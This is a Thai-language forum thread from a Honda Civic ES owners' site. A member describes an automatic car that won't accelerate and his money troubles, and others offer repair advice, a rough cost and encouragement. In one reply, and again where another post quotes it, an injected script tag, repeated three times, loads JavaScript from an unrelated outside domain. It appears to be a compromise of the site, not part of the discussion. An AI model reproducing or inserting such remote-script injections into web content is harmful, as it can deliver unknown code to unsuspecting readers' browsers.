ตอบ
wichan

ชื่อเล่น: ชาญ

เข้าร่วม: 29 สิงหา 2009
ตอบ: 77

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 91
ให้คำขอบคุณ: 5

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 2 กุมภา 2012 22:22 - รถเร่งไม่ขึ้นครับ
สงสัยเกียคงไปแล้วแน่เลยครับรถผม AT ครับปี 2004 ครับถ้าเข้าศูนย์จะโดนเท่าไหร่ครับผมอยู่อยุธยาครับ
ไม่ทราบมีท่านไดแนะนำได้บ้างครับ
ได้รับคำขอบคุณจาก: yorkydog  khem_hatyai  Wut_On 
Nut_Au_Together

ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 2 กุมภา 2012 22:30 - รถเร่งไม่ขึ้นครับ
แนะนำอู่พี่ก่ำ Auto Way วัดดงมูลเหล็กครับ เข้าเช้าได้รถเย็นครับ จบ ๆ เลยประมาณ 20000 บาทครับ
ได้รับคำขอบคุณจาก: wichan  yorkydog  khem_hatyai 
wichan

สมาชิกสับสน
สมาชิกสับสน

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 2 กุมภา 2012 22:45 - รถเร่งไม่ขึ้นครับ
เหมือนโชคชะตากลั่นแกล้งครับต้องขอระบายหน่อยครับ
ก่อนนหน้านี้ผมทำงานที่ บริษัทแห่งหนึ่งที่โรจนะครับทำงานได้สักพักก็เก็บเงินซื้อ Dimention ที่ใฝ่ฝันได้
หลังจากที่ซื้อมาตามผมก็ทราบดีว่ารถมือ 2 ก็ต้องมีปัญหาเป็นธรรมดาผมก็ไม่ได้เครียดอะไรก็ทำมาเรื่อย
พอมาถึงปีนี้น้ำท่วมหนักบริษัทปิดกิจการ(ตกงาน)ได้เงินก้อนมารถก็ไม่เป็นไร หลังจากตกงานได้เงินก้อน
มาก็เอาไปลงทุนทำธุรกิจส่วนตัว หลังจากนั้นเงินก็ใช้ไปกับงานที่เริ่มทำ ตอนนี้แหละครับรถก็ดันมามีปัญหาซ้ะอีก(เกียน่าจะไป)
แฟนก็ยุให้ขายแล้วซื้อรถมือ 1 แต่ด้วยความรักต่อ ES ผมทำไม่ลง ไม่ทราบว่าถ้าผมใช้รถต่อไปแล้วอาการจะหนักขึ้นกว่านี้ไปอีกเปล่าครับ ขอโทษครับขอระบายหน่อย เครียดครับ
ได้รับคำขอบคุณจาก: zan  tochi229  yorkydog  khem_hatyai  benzd  Makai  Wut_On 
BananaBoat

ชื่อเล่น: โบ๊ท

เข้าร่วม: 14 มกรา 2012
ตอบ: 472

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 345

ปี: 2003
พฤหัส, 2 กุมภา 2012 23:28 - รถเร่งไม่ขึ้นครับ
ใจเย็นๆนะครับ สักวันต้องมีต้องดีขึ้นกว่านี้แน่ตราบใดที่เรายังไม่ท้อถอย สู้สู้ครับ
ได้รับคำขอบคุณจาก: yorkydog  khem_hatyai 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
พฤหัส, 2 กุมภา 2012 23:29 - รถเร่งไม่ขึ้นครับ
wichan พิมพ์ว่า:
เหมือนโชคชะตากลั่นแกล้งครับต้องขอระบายหน่อยครับ
ก่อนนหน้านี้ผมทำงานที่ บริษัทแห่งหนึ่งที่โรจนะครับทำงานได้สักพักก็เก็บเงินซื้อ Dimention ที่ใฝ่ฝันได้
หลังจากที่ซื้อมาตามผมก็ทราบดีว่ารถมือ 2 ก็ต้องมีปัญหาเป็นธรรมดาผมก็ไม่ได้เครียดอะไรก็ทำมาเรื่อย
พอมาถึงปีนี้น้ำท่วมหนักบริษัทปิดกิจการ(ตกงาน)ได้เงินก้อนมารถก็ไม่เป็นไร หลังจากตกงานได้เงินก้อน
มาก็เอาไปลงทุนทำธุรกิจส่วนตัว หลังจากนั้นเงินก็ใช้ไปกับงานที่เริ่มทำ ตอนนี้แหละครับรถก็ดันมามีปัญหาซ้ะอีก(เกียน่าจะไป)
แฟนก็ยุให้ขายแล้วซื้อรถมือ 1 แต่ด้วยความรักต่อ ES ผมทำไม่ลง ไม่ทราบว่าถ้าผมใช้รถต่อไปแล้วอาการจะหนักขึ้นกว่านี้ไปอีกเปล่าครับ ขอโทษครับขอระบายหน่อย เครียดครับ

การซื้อรถใหม่คือการจ่ายเงินจำนวนมากเพื่อความสบายใจ แต่ไม่ได้หมายความว่ารถใหม่ไม่เสีย และก็มีค่าบำรุงรักษาเหมือนรถเก่านั่นแหละ
การซ่อมรถไม่ว่ารถเก่ารถใหม่ ควรซ่อมให้ขาด ถ้าซ่อมครึ่งๆกลางๆแล้วมาบ่นว่ามันเสียบ่อย อันนี้ผม nocomment ครับ มันก็เหมือนเราต้องกินข้าว ต้องเจ็บป่วยบ้างเป็นครั้งคราวนั่นแหละครับ

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 2 กุมภา 2012 23:45, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: zan  yorkydog  khem_hatyai  benzd  akawut  bomb3092  pannatad  tippawany 
a_ten

ชื่อเล่น: เอ

เข้าร่วม: 11 มกรา 2012
ตอบ: 554

ได้รับคำขอบคุณ: 519
ให้คำขอบคุณ: 286

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 2 กุมภา 2012 23:34 - รถเร่งไม่ขึ้นครับ
แรกๆผมก็หมดไปเยอะเลยคับ ซ่อมไปขับไป
แต่ตอนนี้ดีแล้วคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: yorkydog  khem_hatyai 
wichan

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 2 กุมภา 2012 23:43 - รถเร่งไม่ขึ้นครับ
eskung พิมพ์ว่า:

การซื้อรถใหม่คือการจ่ายเงินจำนวนมากเพื่อความสบายใจ แต่ไม่ได้หมายความว่ารถใหม่ไม่เสีย และก็มีค่าบำรุงรักษาเหมือนรถเก่านั่นแหละ
การซ่อมรถไม่ว่ารถเก่ารถใหม่ ควรซ่อมให้ขาด ถ้าซ่อมตรึ่งๆกลางแล้วมาบ่นว่ามันเสียบ่อย อันนี้ผม nocomment ครับ มันก็เหมือนเราต้องกินข้าว ต้องเจ็บป่วยบ้างเป็นครั้งคราวนั่นแหละครับ

สำหรับคำแนะนำนี้ผมเห็นด้วยอย่างยิ่งครับขอบคุณมาก ๆ ครับสำหรับกำลังใจ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  zan  khem_hatyai  benzd  Wut_On 
wichan

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 2 กุมภา 2012 23:44 - รถเร่งไม่ขึ้นครับ
a_ten พิมพ์ว่า:
แรกๆผมก็หมดไปเยอะเลยคับ ซ่อมไปขับไป
แต่ตอนนี้ดีแล้วคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ดีใจด้วยครับอย่างไงก็แนะนำกันบ้างน้ะครับ
ได้รับคำขอบคุณจาก: khem_hatyai  benzd  Wut_On 
Golf03

เข้าร่วม: 17 สิงหา 2011
ตอบ: 306

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 241
ให้คำขอบคุณ: 1

ศุกร์, 3 กุมภา 2012 04:57 - รถเร่งไม่ขึ้นครับ
ถ้าผ่านเรื่อง(ซ่อม)เกียร์ AT ไปได้ก็ไม่มีปัญหาอะไรต้องเป็นห่วงแล้วล่ะ ส่วนเครื่องถ้าไม่ติดแก็สก็ไม่มีปัญหาระยะยาวครับใช้ได้นาน
ได้รับคำขอบคุณจาก: yorkydog  khem_hatyai  benzd 
phichetza

ชื่อเล่น: เชษ

เข้าร่วม: 17 ตุลา 2011
ตอบ: 1590

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1420
ให้คำขอบคุณ: 3612

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 3 กุมภา 2012 10:21 - รถเร่งไม่ขึ้นครับ
แล้วไมล์วิ้งไปทะไรแล้วครับ
wichan

สมาชิกสับสน
สมาชิกสับสน

ศุกร์, 3 กุมภา 2012 10:48 - รถเร่งไม่ขึ้นครับ
phichetza พิมพ์ว่า:

17xxxx ครับ
ได้รับคำขอบคุณจาก: khem_hatyai  Wut_On 
Wut_On

ชื่อเล่น: วุฒิ

เข้าร่วม: 13 มกรา 2012
ตอบ: 776

Guru ES
Guru ES

ได้รับคำขอบคุณ: 646
ให้คำขอบคุณ: 540

ปี: 2002
ศุกร์, 3 กุมภา 2012 14:09 - รถเร่งไม่ขึ้นครับ
phichetza พิมพ์ว่า:

17xxxx ครับ

พี่ชาญ ใช้รถคันนี้นานยังครับ แล้วที่ใช้ไปวิ่งไปเท่าไหร่แล้วครับ
รถพี่วิ่งมาตั้ง 170000 เยอะมากๆๆเลยครับ เกียร์พังคงอยู่ที่เจ้าของเก่าใช้ด้วย
ก็อย่างนี้แหละมือ 2 ถูกแต่ต้องตามซ่อม จอดขับมอไซค์ก่อนนะพี่ แล้วเก็บตัง
จัดชุดเกียร์ไปเลยคราวนี้อยุ่ได่นานแน่ แล้วคงจะไม่มีอะไรพังอีก (ที่หนักๆ)
เอาใจช่วยครับ พี่บ้านอยู่แถวไหนครับนิ เดียวขี่มอไซค์ไปหา
ได้รับคำขอบคุณจาก: yorkydog  khem_hatyai  benzd 
yorkydog

ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ศุกร์, 3 กุมภา 2012 14:32 - รถเร่งไม่ขึ้นครับ
ค่อยๆเก็บรายละเอียดจุดหลักๆที่จำเป็นก่อนครับ ส่วนจุดอื่นถ้ายังมองว่ายังถูไถไปได้ก็ใช้มันไปก่อนแต่ในจุดที่คิดว่าไม่ปลอดภัยก็ควรที่จะดูแลมัน มีเงินก็ค่อยซ่อมแซมมันไปเรื่อยๆเดี๋ยวมันก็กลับมาในสภาพสมบูรณ์พอๆกับรถใหม่ทีเดียว ตามหาอะไหล่ในเวบES เรานี่แหละครับ ถูกๆดีๆมีเยอะแยะไป เอาใจช่วยนะครับ
ได้รับคำขอบคุณจาก: khem_hatyai 
khem_hatyai

ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ศุกร์, 3 กุมภา 2012 14:41 - รถเร่งไม่ขึ้นครับ

การซ่อมรถไม่ว่ารถเก่ารถใหม่ ควรซ่อมให้ขาด ถ้าซ่อมครึ่งๆกลางๆแล้วมาบ่นว่ามันเสียบ่อย อันนี้ผม nocomment ครับ มันก็เหมือนเราต้องกินข้าว ต้องเจ็บป่วยบ้างเป็นครั้งคราวนั่นแหละครับ

+1 คำแนะนำที่ดีมากครับ ก่อนได้ ES ก็ ขุ่นเคืองกับพ่อเรื่องนี้แหละ พ่อบอกว่า รถใหม่ใช้ไปเหอะ 4-5 ปี โน่น กว่าจะซ่อม
แต่เราชอบ ES ทำไงได้
ได้รับคำขอบคุณจาก: yorkydog  benzd  bomb3092  ค้าอะไหล่โคตรเก่า 
ed02

เข้าร่วม: 25 ธันวา 2010
ตอบ: 564

ได้รับคำขอบคุณ: 467
ให้คำขอบคุณ: 635
ศุกร์, 3 กุมภา 2012 14:47 - รถเร่งไม่ขึ้นครับ
ลองเช็คระบบอื่นดูก่อนครับ บางทีอาจจะไม่ใช่เกียร์ก็ได้ครับ ของผมปี 02 วิ่งไป 190,000 กว่าแล้ว มีอาการกระตุกตอนเวลาขับ ทีแรกนึกว่าเกียร์ไปหาอู่จะซ่อมเกียร์ อู่ลองขับดูจับเปลี่ยนหัวเทียน 4 หัว อาการหายเฉยเลย อู่เปิดใหม่แถวรามอินทรา กม. 4 ลองโทรไปคุยดูครับ เผื่อจะได้สบายใจครับ
ได้รับคำขอบคุณจาก: benzd  khem_hatyai 
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ศุกร์, 3 กุมภา 2012 15:12 - รถเร่งไม่ขึ้นครับ
ผมก้อเคยเครียดกับการซ่อมนะครับ แต่ผมคิดว่าผมรักมันมากการที่จะดูแลมันทำไมเราถึงจะทำไม่ได้หล่ะ

อีกอย่างซ่อมไปเรื่อย เด๋วมันก้อดีขึ้นเองคับ หาร้านดีๆครับ ในเว็บเรามีคนให้คำแนะนำเยอะ ใจเยนๆคับ

ให้ทุกๆอย่าง ทุกเรื่องมันค่อยเป็นค่อยไปครับ สู้ สู้ ๆๆๆๆๆ
ได้รับคำขอบคุณจาก: khem_hatyai 
wichan

สมาชิกสับสน
สมาชิกสับสน

ศุกร์, 3 กุมภา 2012 22:12 - รถเร่งไม่ขึ้นครับ
yorkydog พิมพ์ว่า:
ค่อยๆเก็บรายละเอียดจุดหลักๆที่จำเป็นก่อนครับ ส่วนจุดอื่นถ้ายังมองว่ายังถูไถไปได้ก็ใช้มันไปก่อนแต่ในจุดที่คิดว่าไม่ปลอดภัยก็ควรที่จะดูแลมัน มีเงินก็ค่อยซ่อมแซมมันไปเรื่อยๆเดี๋ยวมันก็กลับมาในสภาพสมบูรณ์พอๆกับรถใหม่ทีเดียว ตามหาอะไหล่ในเวบES เรานี่แหละครับ ถูกๆดีๆมีเยอะแยะไป เอาใจช่วยนะครับ

ขอบคุณน้ะครับ
ได้รับคำขอบคุณจาก: khem_hatyai  Wut_On 
wichan

สมาชิกสับสน
สมาชิกสับสน

ศุกร์, 3 กุมภา 2012 22:13 - รถเร่งไม่ขึ้นครับ
khem_hatyai พิมพ์ว่า:

+1 คำแนะนำที่ดีมากครับ ก่อนได้ ES ก็ ขุ่นเคืองกับพ่อเรื่องนี้แหละ พ่อบอกว่า รถใหม่ใช้ไปเหอะ 4-5 ปี โน่น กว่าจะซ่อม
แต่เราชอบ ES ทำไงได้

เหมือนกีครับผมมันสายเลือด ES ครับ
ได้รับคำขอบคุณจาก: khem_hatyai  Wut_On  ค้าอะไหล่โคตรเก่า 
wichan

สมาชิกสับสน
สมาชิกสับสน

ศุกร์, 3 กุมภา 2012 22:14 - รถเร่งไม่ขึ้นครับ
Makai พิมพ์ว่า:
ผมก้อเคยเครียดกับการซ่อมนะครับ แต่ผมคิดว่าผมรักมันมากการที่จะดูแลมันทำไมเราถึงจะทำไม่ได้หล่ะ

อีกอย่างซ่อมไปเรื่อย เด๋วมันก้อดีขึ้นเองคับ หาร้านดีๆครับ ในเว็บเรามีคนให้คำแนะนำเยอะ ใจเยนๆคับ

ให้ทุกๆอย่าง ทุกเรื่องมันค่อยเป็นค่อยไปครับ สู้ สู้ ๆๆๆๆๆ

ขอบคุณสำหรับกกำลังใจคร้าบ
Wut_On

Guru ES
Guru ES

เสาร์, 4 กุมภา 2012 18:58 - รถเร่งไม่ขึ้นครับ
หายไวๆๆนะครับ
table

ชื่อเล่น: โต๊ะ

เข้าร่วม: 25 กันยา 2010
ตอบ: 945

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 139
ให้คำขอบคุณ: 787

เสาร์, 4 กุมภา 2012 19:19 - รถเร่งไม่ขึ้นครับ
ตั้งแต่อยู่บ้านหลังนี้มารถปี 04 ไม่เคยได้ยินเลยว่าเกียร์พังนะครับ นอกจากปี 01-02 ค่อยๆดูค่อยๆซ่อมไปอาจไม่ใช้ที่เกียร์ก้อได้ลองใช้ช่องค้นหาศึกษาข้อมูลในบอร์ดดูก่อนก้อได้ครับ ขอรายละเอียดอาการรถแบบละเอียดๆหน่อยเดี๋ยวเพื่อนๆคงตอบได้ เอาใจช่วยครับ
monkey-es

ชื่อเล่น: อ็อบ

เข้าร่วม: 30 ธันวา 2008
ตอบ: 672

Guru ES
Guru ES

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 1026

สี: แดง แรลไล (R-513)
อาทิตย์, 5 กุมภา 2012 21:36 - รถเร่งไม่ขึ้นครับ
อย่าถ้อถอย ครับ มีปัญหาเราคุยกัน PM มาระบายกันได้
ได้รับคำขอบคุณจาก: Wut_On 
Wut_On

Guru ES
Guru ES

อาทิตย์, 5 กุมภา 2012 21:47 - รถเร่งไม่ขึ้นครับ
เอาใจช่วยครับ พี่ชาญ
wichan

สมาชิกสับสน
สมาชิกสับสน

อาทิตย์, 5 กุมภา 2012 21:56 - รถเร่งไม่ขึ้นครับ
ขอบคุณทุกกำลังใจครับยังถ้าแก้ใขรถแล้วจะมาแชร์กันน้ะครับ
ได้รับคำขอบคุณจาก: Wut_On 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.